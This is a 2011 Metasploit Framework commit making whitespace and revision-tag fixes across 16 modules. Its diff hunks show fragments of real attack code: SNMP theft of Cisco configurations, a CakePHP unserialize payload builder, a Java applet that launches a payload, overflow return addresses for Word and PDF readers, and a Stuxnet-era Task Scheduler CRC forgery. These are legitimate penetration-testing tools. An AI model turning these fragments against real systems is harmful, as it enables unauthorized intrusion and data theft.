style compliance fixes

git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2011-01-08 01:13:26 +00:00
parent af79f5c0ea
commit 287f4c87fe
16 changed files with 167 additions and 160 deletions

View File

@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %q{
This module will download the startup or running configuration
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
community is required. The SNMP community scanner module can
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
community is required. The SNMP community scanner module can
assist in identifying a read-write community. The target must
be able to connect back to the Metasploit system and the use of
NAT will cause the TFTP transfer to fail.
@ -54,12 +54,12 @@ class Metasploit3 < Msf::Auxiliary
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
@tftp.start
add_socket(@tftp.sock)
@main_thread = ::Thread.current
print_status("Scanning for vulnerable targets...")
end
#
# Kill the TFTP server
#
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
# Wait 5 seconds for background transfers to complete
print_status("Providing some time for transfers to complete...")
::IO.select(nil, nil, nil, 5.0)
print_status("Shutting down the TFTP service...")
if @tftp
@tftp.close rescue nil
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#
# Callback for incoming files
#
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Auxiliary
data = info[:file][:data]
from = info[:from]
return if not (name and data)
# Trim off IPv6 mapped IPv4 if necessary
from = from[0].dup
from.gsub!('::ffff:', '')
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
# Save the configuration file if a path is specified
# Save the configuration file if a path is specified
if datastore['OUTPUTDIR']
name = "#{from}.txt"
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
@ -104,13 +104,13 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Saved configuration file to #{path}")
end
# Toss the configuration file to the parser
cisco_ios_config_eater(from, 161, data)
end
def run_host(ip)
begin
source = datastore['SOURCE'].to_i
protocol = 1
@ -127,11 +127,11 @@ class Metasploit3 < Msf::Auxiliary
session = rand(255) + 1
snmp = connect_snmp
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
value = snmp.set(varbind)
# If the above line didn't throw an error, the host is alive and the community is valid
print_status("Trying to acquire configuration from #{ip}...")
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary
value = snmp.set(varbind)
disconnect_snmp
# No need to make noise about timeouts
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
rescue ::Interrupt

View File

@ -44,36 +44,36 @@ class Metasploit3 < Msf::Auxiliary
#
#
#
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
sysName = '-'
end
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
sysDesc = '-'
end
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
sysContact = '-'
end
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
sysLocation = '-'
end
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
year = month = day = hour = minutes = seconds = tenths = 0
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
systemDate = '-'
@ -109,9 +109,9 @@ class Metasploit3 < Msf::Auxiliary
print_line("Location : #{sysLocation}")
print_line("Uptime snmp : #{sysUpTimeInstance}")
print_line("Uptime system : #{hrSystemUptime}")
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
if sysName.length > 0
report_note(
:host => ip,
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
:data => sysName.strip
)
end
if sysDesc.length > 0
report_note(
:host => ip,
@ -131,30 +131,30 @@ class Metasploit3 < Msf::Auxiliary
:data => sysDesc.strip
)
end
if (sysDesc =~ /Windows/)
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
print_line("Domain : #{domPrimaryDomain}")
#
#
#
users = []
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
users.push([[user.value]])
end
if not users.empty?
print_line('')
print_status("User accounts\n")
users.each {|a| print_line("#{a}")}
end
end
#
#
#
@ -162,57 +162,57 @@ class Metasploit3 < Msf::Auxiliary
network_information = []
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
if ipForwarding == 0 || ipForwarding == 2
if ipForwarding == 0 || ipForwarding == 2
ipForwarding = "no"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
elsif ipForwarding == 1
ipForwarding = "yes"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
end
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
if ipDefaultTTL.to_s !~ /Null/
network_information.push([["Default TTL : "],[ipDefaultTTL]])
end
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
if tcpInSegs.to_s !~ /Null/
network_information.push([["TCP segments received : "],[tcpInSegs]])
end
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
if tcpOutSegs.to_s !~ /Null/
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
end
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
if tcpRetransSegs.to_s !~ /Null/
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
end
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
if ipInReceives.to_s !~ /Null/
network_information.push([["Input datagrams : "],[ipInReceives]])
end
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
if ipInDelivers.to_s !~ /Null/
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
end
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
if ipOutRequests.to_s !~ /Null/
network_information.push([["Output datagrams : "],[ipOutRequests]])
end
if not network_information.empty?
print_line('')
print_status("Network information")
print_line('')
network_information.each {|a,b| print_line("#{a} #{b}")}
end
#
#
#
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces = []
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
ifindex = index.value
ifdescr = descr.value
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
@ -230,11 +230,11 @@ class Metasploit3 < Msf::Auxiliary
ifinoc = inoc.value
ifoutoc = outoc.value
ifstatus = status.value
case iftype
when 1
iftype = "other"
when 2
when 2
iftype = "regular1822"
when 3
iftype = "hdh1822"
@ -315,7 +315,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
end
if not network_interfaces.empty?
print_line('')
print_status("Network interfaces")
@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
#
#
#
@ -343,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
end
if not network_ip.empty?
print_line('')
print_status("Network IP")
@ -352,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
#
#
#
@ -365,7 +365,7 @@ class Metasploit3 < Msf::Auxiliary
end
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
end
if not routing.empty?
print_line('')
print_status("Routing information")
@ -374,7 +374,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
#
#
#
@ -382,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
tcp = []
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
ladd = "-"
else
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
else
rport = rport.value
end
case state.value
when 1
state = "closed"
@ -438,7 +438,7 @@ class Metasploit3 < Msf::Auxiliary
tcp.push([[ladd],[lport],[radd],[rport],[state]])
end
if not tcp.empty?
print_line('')
print_status("TCP connections and listening ports")
@ -447,7 +447,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
end
#
#
#
@ -457,8 +457,8 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
udp.push([[ladd.value],[lport.value]])
end
if not udp.empty?
if not udp.empty?
print_line('')
print_status("Listening UDP ports")
print_line('')
@ -466,13 +466,13 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
end
#
#
#
if (sysDesc =~ /Windows/)
#
#
#
@ -480,13 +480,13 @@ class Metasploit3 < Msf::Auxiliary
network_services = []
n = 0
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
network_services.push([[n],[name.value]])
n+=1
end
if not network_services.empty?
if not network_services.empty?
print_line('')
print_status("Network services")
print_line('')
@ -494,29 +494,29 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
end
#
#
#
share = []
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
share.push([[name.value],[path.value],[comment.value]])
end
if not share.empty?
if not share.empty?
print_line('')
print_status("Share")
print_line('')
share.each {|a,b,c|
print_line("Name : #{a}")
print_line("Name : #{a}")
print_line("Path : #{b}")
print_line("Comment : #{c}")
print_line('')
}
end
#
#
#
@ -527,17 +527,17 @@ class Metasploit3 < Msf::Auxiliary
if http_totalBytesSentLowWord.to_s !~ /Null/
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
end
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
if http_totalBytesReceivedLowWord.to_s !~ /Null/
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
end
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
if http_totalFilesSent.to_s !~ /Null/
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
end
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
if http_currentAnonymousUsers.to_s !~ /Null/
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary
if http_maxConnections.to_s !~ /Null/
iis.push([["MaxConnections : "],[http_maxConnections]])
end
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
if http_connectionAttempts.to_s !~ /Null/
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
@ -607,34 +607,34 @@ class Metasploit3 < Msf::Auxiliary
if http_totalOthers.to_s !~ /Null/
iis.push([["Others : "],[http_totalOthers]])
end
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
if http_totalCGIRequests.to_s !~ /Null/
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
end
http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
if http_totalBGIRequests.to_s !~ /Null/
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
end
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
if http_totalNotFoundErrors.to_s !~ /Null/
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
end
if not iis.empty?
if not iis.empty?
print_line('')
print_status("IIS server information")
print_line('')
iis.each {|a,b| print_line("#{a} #{b}")}
end
end
#
#
#
storage_information = []
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
@ -670,16 +670,16 @@ class Metasploit3 < Msf::Auxiliary
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
end
if not storage_information.empty?
if not storage_information.empty?
print_line('')
print_status("Storage information")
print_line('')
storage_information.each {|a,b,c,d,e,f|
e = number_to_human_size(e,d)
f = number_to_human_size(f,d)
print_line("#{a}")
print_line("\tDevice id : #{b}")
print_line("\tFilesystem type : #{c}")
@ -689,23 +689,23 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
#
#
#
file_system = []
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
if hrFSIndex.to_s !~ /Null/
file_system.push([["Index : "],[hrFSIndex]])
end
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
if hrFSMountPoint.to_s !~ /Null/
file_system.push([["Mount point : "],[hrFSMountPoint]])
end
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
if hrFSRemoteMountPoint.to_s !~ /Null/
if hrFSRemoteMountPoint.empty?
@ -713,7 +713,7 @@ class Metasploit3 < Msf::Auxiliary
end
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
end
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
case hrFSType.to_s
@ -766,7 +766,7 @@ class Metasploit3 < Msf::Auxiliary
else
hrFSType = "Null"
end
if hrFSType.to_s !~ /Null/
file_system.push([["Type : "],[hrFSType]])
end
@ -775,12 +775,12 @@ class Metasploit3 < Msf::Auxiliary
if hrFSAccess.to_s !~ /Null/
file_system.push([["Access : "],[hrFSAccess]])
end
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
if hrFSBootable.to_s !~ /Null/
file_system.push([["Bootable : "],[hrFSBootable]])
end
if not file_system.empty?
print_line('')
print_status("File system information")
@ -795,7 +795,7 @@ class Metasploit3 < Msf::Auxiliary
device_information = []
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
case type.value.to_s
when /^1.3.6.1.2.1.25.3.1.1$/
type.value = "Other"
@ -836,7 +836,7 @@ class Metasploit3 < Msf::Auxiliary
else
type.value = "unknown"
end
case status.value
when 1
status.value = "unknown"
@ -856,8 +856,8 @@ class Metasploit3 < Msf::Auxiliary
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
end
if not device_information.empty?
if not device_information.empty?
print_line('')
print_status("Device information")
print_line('')
@ -876,7 +876,7 @@ class Metasploit3 < Msf::Auxiliary
software_list.push([[index.value],[name.value]])
end
if not software_list.empty?
if not software_list.empty?
print_line('')
print_status("Software components")
print_line('')
@ -900,11 +900,11 @@ class Metasploit3 < Msf::Auxiliary
else
status.value = "unknown"
end
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
end
if not process_interfaces.empty?
if not process_interfaces.empty?
print_line('')
print_status("Process interfaces")
print_line('')
@ -912,7 +912,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
end
#
#
#
@ -935,7 +935,7 @@ class Metasploit3 < Msf::Auxiliary
end
def number_to_human_size(size,unit)
size = size.first.to_i * unit.first.to_i
size = size.first.to_i * unit.first.to_i
if size < 1024
"#{size} bytes"

View File

@ -1,5 +1,5 @@
##
# $Id: $
# $Id$
##
##
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'SNMP Set Module',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'Description' => %q{
This module, similar to snmpset tool, uses the SNMP SET request
to set information on a network entity. A OID (numeric notation)

View File

@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error
@use_static = true
else
else
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
@ -241,20 +241,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def applet_code
applet = %Q|
applet = <<-EOS
import java.applet.*;
import metasploit.*;
public class #{datastore["APPLETNAME"]} extends Applet {
public void init() {
try {
Payload.main(null);
} catch (Exception ex) {
//ex.printStackTrace();
}
}
public void init() {
try {
Payload.main(null);
} catch (Exception ex) {
//ex.printStackTrace();
}
}
}
|
EOS
end
end

View File

@ -22,12 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
CakePHP is a popular PHP framework for building web applications.
The Security component of CakePHP is vulnerable to an unserialize attack which
could be abused to allow unauthenticated attackers to execute arbitrary
could be abused to allow unauthenticated attackers to execute arbitrary
code with the permissions of the webserver.
},
'Author' =>
[
'tdz',
'tdz',
'Felix Wilhelm', # poc
],
'License' => MSF_LICENSE,
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
p << 's:3:"Foo";s:'
p << len.to_s()
p << ':"<? '
p << payload.encoded
p << payload.encoded
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
#rot13 and urlencode
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
'ctype' => 'application/x-www-form-urlencoded',
'data' => data
}, 5)
print_status("Sending exploit request 2")
res = send_request_cgi(
{
{
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',

View File

@ -21,17 +21,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
'Description' => %q{
This module exploits a command injection flaw within the Mitel
Audio and Web Conferencing web interface.
Audio and Web Conferencing web interface.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
['OSVDB', '69934'],
# ['CVE', ''],
# ['CVE', ''],
# ['BID', '']
],
'Platform' => ['unix', 'linux'],
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("Attempting to execute our command..")
res = send_request_cgi(
{
'uri' => datastore['URIPATH'],
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
return
end
handler
end

0
modules/exploits/unix/webapp/redmine_scm_exec.rb Executable file → Normal file
View File

View File

@ -1,5 +1,5 @@
##
# $Id: $
# $Id$
##
##
@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB' => '50421'],

View File

@ -1,5 +1,5 @@
##
# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
# $Id$
##
##
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Matthias Kaiser', # Discovery, PoC, metasploit module
'egypt' # metasploit module
],
'Version' => '$Revision: 10488 $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-3563' ],
@ -87,24 +87,26 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
when /init.jnlp/
init = %Q|<?xml version="1.0" encoding="UTF-8"?>
init = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/init.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="BasicServiceExploit">
<argument>#{jpath}</argument>
</application-desc>
#{jnlp_info}
<application-desc main-class="BasicServiceExploit">
<argument>#{jpath}</argument>
</application-desc>
</jnlp>
|
EOS
print_status("Sending init.jnlp")
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /exploit.jnlp/
expl = %Q|<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="Exploit"/>
</jnlp>
|
expl = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="Exploit"/>
</jnlp>
EOS
print_status("Sending exploit.jnlp")
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
@ -129,15 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
end
def jnlp_info
%Q|<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.6+"/>
<jar href="#{get_uri}/exploit.jar"/>
</resources>
|
buf <<-EOS
<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.6+"/>
<jar href="#{get_uri}/exploit.jar"/>
</resources>
EOS
end
end

View File

@ -38,9 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
The WMI Adminsitrative Tools are a standalone download & install (linked in the
references).
references).
},
'License' => MSF_LICENSE,

View File

@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
],
'Privileged' => false,
'DisclosureDate' => 'July 1 2009',
'DefaultTarget' => 0))
register_options(

View File

@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 25 2009',
'DefaultTarget' => 0))
register_options(

View File

@ -23,12 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
The Microsoft Word RTF parser was only used by default in versions of Microsoft
The Microsoft Word RTF parser was only used by default in versions of Microsoft
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
began using the Word RTF parser, by default, to handle rich-text messages within
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Stick fake SEH frames here and there ;)
if target.name == "Automatic"
targets.each { |t|
next if t.name !~ /Windows/i
next if t.name !~ /Windows/i
add_target(rest, t)
}
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
file_create(content)
end

View File

@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == "Automatic"
targets.each { |t|
next if t.name !~ /Windows/i
next if t.name !~ /Windows/i
add_target(data, t)
}

View File

@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
],
'DisclosureDate' => 'Oct 08 2010',
'DefaultTarget' => 0))
register_options(

View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Schelevator',
'Description' => %q{
'Description' => %q{
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
NOTE: Thanks to webDEViL for the information about disable/enable.
},
@ -324,7 +324,7 @@ class Metasploit3 < Msf::Post
crc = crc32(data[0, data.length - 12])
data[-12, 4] = [crc].pack('V')
data[-12, 12].unpack('C*').reverse.each { |b|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
}